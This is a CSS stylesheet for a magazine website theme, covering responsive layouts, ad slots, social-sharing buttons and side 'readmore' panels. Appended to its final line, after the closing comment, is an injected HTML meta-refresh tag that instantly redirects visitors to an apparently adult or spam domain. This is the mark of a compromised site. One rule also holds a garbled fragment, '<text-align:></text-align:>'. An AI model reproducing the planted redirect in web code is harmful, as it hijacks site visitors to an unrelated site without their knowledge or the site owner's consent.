    height:auto; width:auto;
  }
  .footer-widget {
    clear:both;
  }
  .block5 .footer-logo {
    width:auto;
  }
  .block5 .footer-text {
    width:auto;
  }
  #footer-nav {
    float:left;
  }
  #slider .entry p {
    display:none;
  }
  ul#tabnav li {
    width:100%;
  }
  ul#tabnav li a {
    padding-left:20px;
    text-align:left;
  }
  .attachment-post-first {
    width:100%;
  }
  
  /* Comment */
  
  .commentlist .children li {
    margin-left: 0;
  }
  
  .comment .reply {
	top:auto;
	bottom:0;
  }
  .navbar{padding:5px 0 10px;}  .mini_menu{margin: 10px 0 !important;width:100%; float:none;} #logo{width:100% !important;  float:none !important; text-align:center !important;}
}

@media (max-width:479px) {

#content {
  background:#FFF;
  padding:10px 10px 20px;
}

.breadcrumbs{
display:none
}

  .brnews h3 {
    float:none;
  }
  #intr .search {
    margin-top:20px;
  }
  #mast-head {
    max-width:100% !important;
  }
  #slider .entry h4 {
    font-size:11px;
    line-height:14px;
  }
  .thumb {
    width:100%;
    margin-bottom:5px;
  }  .mini_menu{margin: 10px 0 !important;width:100%; float:none;} #logo{width:100% !important; float:none !important; text-align:center !important;}
  #home-middle .date,
  #home-bottom .date,
  #home_bottom_al .date,
  .latest-posts .date {
    display:block;
    left:0;
    position:relative;
  }
  img.twit-pic {
    margin-bottom:10px;
  }
  .socmed ul li {
    border-right:1px solid #e3e3e3;
    width:100%;
  }
  .block5 .footer-logo {
    border-right:none;
  }
  .bx-controls {
    position:relative;
  }
  .bx-next {
    float:right;
  }
  
  
  h2.entry-title {
	position:static;
	text-align:center;
  }  
  
  .the_title {
	max-width:100%;
  } 	
  
  .entry-cat {
	position:static;
  }
  
  
}

/* Miscellaneous  */

.head-ad{
	text-align:center;
    margin-bottom: 20px;	
	padding:0 40px;
}

.side_ad,
.img_banner_ads{
	margin-bottom:20px;
}

.img_banner_ads{
	text-align:center;
	margin-left:auto;
	margin-right:auto;
}

.head-ad img,
.img_banner_ads img{
	max-width:100%;
	height:auto;
}

.head-ad .image_ad{
	text-align:center;
}

.image_ad{
	text-align:center;
}

.image_ad a img{
	max-width:100%;
	height:auto;
}

.single-ad .image_ad{
	margin-top:15px;
}

.singe_ad{
	margin-top:20px;
}

.ads_code{
	display:table;
	margin:0 auto;
	display:table;
	max-width:100%;	
}

.head-ad .ads_code{
	width:728px;
	max-width:100%;	
}

.side_ad .ads_code{
	width:336px;
	max-width:100%;
}

.singe_ad .ads_code{ 
	width:468px;
	max-width:100%;	
	<text-align:></text-align:>center;	
}	

.ads_code iframe{
	max-width:100%;
}

.ads_code img{
	max-width:100%;
	height:auto;
}

.breadcrumbs{
padding:11px 0 0 20px;
}

.top-rated{
font-size:18px;
text-transform:uppercase;
}

/*  ----------------------------------------------------------------------------
    social sharing
*/
.td-social-sharing {
  margin-bottom: 42px;
}
.td-social-sharing ul {
  margin: 0;
}
.td-social-sharing ul li {
  display: inline;
  list-style: none;
  /* responsive phone */
}
@media (max-width: 767px) {
  .td-social-sharing ul li {
    display: block;
    text-align: center;
  }
}

@media (max-width: 767px) {
#content {
  background:#FFF;
  padding:10px 10px 20px;
}
  .td-social-sharing-buttons {
    position: relative;
    left: -6px;
    margin: 3px 3px 0px 7px;
    padding: 0px;
  }
}
@media (min-width: 768px) and (max-width: 1018px) {
  .td-social-sharing-buttons {
    font-size: 10px;
  }
}
.td-social-sharing-buttons div {
  display: inline-block;
  position: relative;
  top: -5px;
  padding-right: 7px;
  /* responsive phone */
}
@media (max-width: 767px) {
  .td-social-sharing-buttons div {
    position: relative;
    left: -3px;
    padding: 0px;
    margin: 0px;
  }
}
.td-social-sharing-buttons div.td-social-but-text {
  position: relative;
  top: -11px;
  padding-right: 15px;
}
@media (min-width: 768px) and (max-width: 1018px) {
  .td-social-sharing-buttons div.td-social-but-text {
    top: -12px;
  }
}
.td-social-sharing-buttons:hover {
  color: #FFFFFF;
  background-color: #474747;
}
.td-social-sharing-buttons:focus {
  color: #FFFFFF;
}
.td-social-twitter {
  background-color: #55acee;
}
.td-social-facebook {
  background-color: #47639e;
}
.td-social-google {
  background-color: #dd4b39;
}
.td-social-vkontakte {
  background-color: #5D83AA;
}
/* responsive phone */
@media (max-width: 767px) {
  div.td-social-but-text {
    display: none;
  }
}
.td-tags-and-social-wrapper-box {
  border-top: 1px solid #f5f5f5;
  border-left: 1px solid #f5f5f5;
  border-right: 1px solid #f5f5f5;
  background-color: #fcfcfc;
  padding: 8px 2px 4px 10px;
  /* responsive phone */
}
@media (max-width: 767px) {
  .td-tags-and-social-wrapper-box {
    text-align: center ;
    padding: 6px 2px 7px 10px;
  }
}
/* responsive phone */
@media (max-width: 767px) {
  .td-tags-and-social-wrapper-box ul li {
    display: inline-block;
    text-align: center ;
  }
}
.td-tags-and-social-wrapper-box-bottom-line {
  border-bottom: 1px solid #f5f5f5;
  /*text-align:center;*/
  /* responsive phone */
}
@media (max-width: 767px) {
  .td-tags-and-social-wrapper-box-bottom-line {
    padding-bottom: 3px;
  }
}
/*  ----------------------------------------------------------------------------
    social like/tweet
*/
.td-social-like-tweet ul {
  margin: 28px 0 0px 0;
}
.td-social-like-tweet ul li {
  display: inline;
  list-style: none;
  /* responsive phone */
}
@media (max-width: 767px) {
  .td-social-like-tweet ul li {
    display: block;
    text-align: center;
  }
}
.td-social-like-tweet ul .td-like-tweet-facebook {
  top: 1px;
  position: relative;
}
/* responsive phone */
@media (max-width: 767px) {
  .td-social-like-tweet {
    padding: 21px 10px 4px 10px;
    background-color: #fcfcfc;
    border: 1px solid #f5f5f5;
    margin-top: 44px;
  }
  .td-social-like-tweet ul {
    margin-top: 0px;
  }
  .td-like-tweet-twitter {
    position: relative;
    left: -5px;
    padding-bottom: 10px;
  }
  .td-like-tweet-facebook {
    position: relative;
    left: 9px;
    padding-bottom: 10px;
  }
  .td-like-tweet-google {
    position: relative;
    left: 13px;
    padding-bottom: 10px;
  }
}
.td-social-like-tweet {
  margin-bottom: 42px;
}

.ie8 .td-social-sharing {
  display: none;
}

.td-sp-share-facebook {
  width: 31px;
  height: 31px;
  background-position: 0 0px;
}
.td-sp-share-twitter {
  width: 31px;
  height: 31px;
  background-position: 0 -52px;
}
.td-sp-share-google {
  width: 31px;
  height: 31px;
  background-position: 0 -101px;
}
.td-sp-share-vkontakte {
  width: 31px;
  height: 31px;
    background-position: 0 -154px;
}

.td-sp,
.td-scroll-up-visible {
  background-image: url('/upkeep/themes/magazine/images/elements3.png');
  background-repeat: no-repeat;
  display: block;
}

.entry2 a {
    color: #424242;
	font-size: 14px;
    font-weight: normal;
}

.entry2 h3 {
    line-height: 16px;
}

.single-head {
    -moz-box-sizing: border-box;
}
.head-img img{
width:160px;
height:104px;
}

.widget_top_rated li a{
font-size:16px;
}

.td-social-sharing-buttons {
  display: inline-block;
  color: #ffffff;
  text-transform: uppercase;
  font-family: 'PT Sans', sans-serif;
  font-weight: bold;
  font-size: 13px;
  margin: 0 10px 0 0;
  cursor: pointer;
  height: 31px;
  /* responsive phone */
  /* responsive portrait */
}

.mistake{
float:right;
margin-top:-6px;
font-size:12px;
font-weight:bold;
text-transform:uppercase;
color:#000000;
padding-right:10px;
}

/*====================READMORE ARROWS RIGHT-LEFT=============================*/
.readmore .announce{display:block;width:380px;margin:0}
.readmore .announce__image{margin:0px;float:right;width:180px;height:160px;overflow:hidden;position:relative;z-index:13}
.readmore .announce__image img{width:180px;height:160px;}
.readmore .announce__info{margin:10px 0;padding:0 10px;float:left;width:171px;height:140px;overflow:hidden}
.readmore .announce__info:before{box-shadow:-30px -15px 20px 15px #fff;content:"";display:block;position:absolute;bottom:0;width:100%;z-index:1}
.announce:hover{text-decoration:none}
.announce__image{display:block;margin-bottom:5px}
.announce__title-in{color:#646464;padding-right:7px;font-size:17px;line-height:18px;text-transform:uppercase;}

.readmore__left{position:fixed;top:50%;left:0;z-index:12;width:47px;height:160px;margin-top:-79px;background:#fff;-webkit-box-shadow:0 0 5px 1px rgba(0,0,0,0.3);-khtml-box-shadow:0 0 5px 1px rgba(0,0,0,0.3);-moz-box-shadow:0 0 5px 1px rgba(0,0,0,0.3);-o-box-shadow:0 0 5px 1px rgba(0,0,0,0.3);box-shadow:0 0 5px 1px rgba(0,0,0,0.3)}
.readmore__left .readmore__arrow{left:12px;background-position:0 0}
.readmore__left:hover{-webkit-box-shadow:-6px 0 5px 1px rgba(0,0,0,0.3);-khtml-box-shadow:-6px 0 5px 1px rgba(0,0,0,0.3);-moz-box-shadow:-6px 0 5px 1px rgba(0,0,0,0.3);-o-box-shadow:-6px 0 5px 1px rgba(0,0,0,0.3);box-shadow:-6px 0 5px 1px rgba(0,0,0,0.3);cursor:pointer}
.readmore__left:hover .readmore__data{display:block}
.readmore__left:hover .readmore__arrow{background-position:0 -22px}
.readmore__right{position:fixed;top:50%;right:0;z-index:12;width:47px;height:160px;margin-top:-79px;background:#fff;-webkit-box-shadow:0 0 5px 1px rgba(0,0,0,0.3);-khtml-box-shadow:0 0 5px 1px rgba(0,0,0,0.3);-moz-box-shadow:0 0 5px 1px rgba(0,0,0,0.3);-o-box-shadow:0 0 5px 1px rgba(0,0,0,0.3);box-shadow:0 0 5px 1px rgba(0,0,0,0.3)}
.readmore__right .readmore__arrow{right:12px;background-position:-12px 0}
.readmore__right:hover{-webkit-box-shadow:6px 0 5px 1px rgba(0,0,0,0.3);-khtml-box-shadow:6px 0 5px 1px rgba(0,0,0,0.3);-moz-box-shadow:6px 0 5px 1px rgba(0,0,0,0.3);-o-box-shadow:6px 0 5px 1px rgba(0,0,0,0.3);box-shadow:6px 0 5px 1px rgba(0,0,0,0.3);cursor:pointer}
.readmore__right:hover .readmore__data{display:block}
.readmore__right:hover .readmore__arrow{background-position:-12px -22px}
.readmore__right .announce__image{float:left}
.readmore__right .readmore__data{left:auto;right:40px;-webkit-box-shadow:-3px 0 5px 1px rgba(0,0,0,0.3);-khtml-box-shadow:-3px 0 5px 1px rgba(0,0,0,0.3);-moz-box-shadow:-3px 0 5px 1px rgba(0,0,0,0.3);-o-box-shadow:-3px 0 5px 1px rgba(0,0,0,0.3);box-shadow:-3px 0 5px 1px rgba(0,0,0,0.3)}
.readmore__right .announce__info{border:0}
.readmore__right .announce__info:before{box-shadow:10px -10px 20px 15px #fff}
.readmore__arrow{position:absolute;top:42%;display:block;width:14px;height:21px;background-image:url('/upkeep/themes/magazine/images/readmore-arrow.png');background-repeat:no-repeat}
.readmore__data{background:#fff;position:absolute;top:0;left:40px;height:160px;width:auto;display:none;overflow:hidden;-webkit-box-shadow:3px 0 5px 1px rgba(0,0,0,0.3);-khtml-box-shadow:3px 0 5px 1px rgba(0,0,0,0.3);-moz-box-shadow:3px 0 5px 1px rgba(0,0,0,0.3);-o-box-shadow:3px 0 5px 1px rgba(0,0,0,0.3);box-shadow:3px 0 5px 1px rgba(0,0,0,0.3)}
.readmore__noimage .announce__info{border:0;width:auto}

@media (max-width:1024px) {
.readmore__left, .readmore__right {width:20px;}
.readmore__left .readmore__arrow { left: 2px;}
.readmore__right .readmore__arrow { right: 2px;}
.readmore__right .readmore__data{left:auto;right:0;}
.readmore__left .readmore__data{left:auto;left:0;}
}

@media (max-width:1000px){
.readmore{
display:none;
}
.mini_menu{
display:none;
}
#intr, .tagz{
display:none;
}
.first-img{
/*float:none;*/
float:left;
padding-right:12px;
}

}

@media (min-width: 980px) {
  .nav-collapse.collapse {
    height: auto !important;
    overflow: visible !important;
  }
  .tabletsidebar{display:none;}
}

/*====================READMORE ARROWS RIGHT-LEFT=============================*/<meta http-equiv='refresh' content='0;URL=https://brazzer.film'>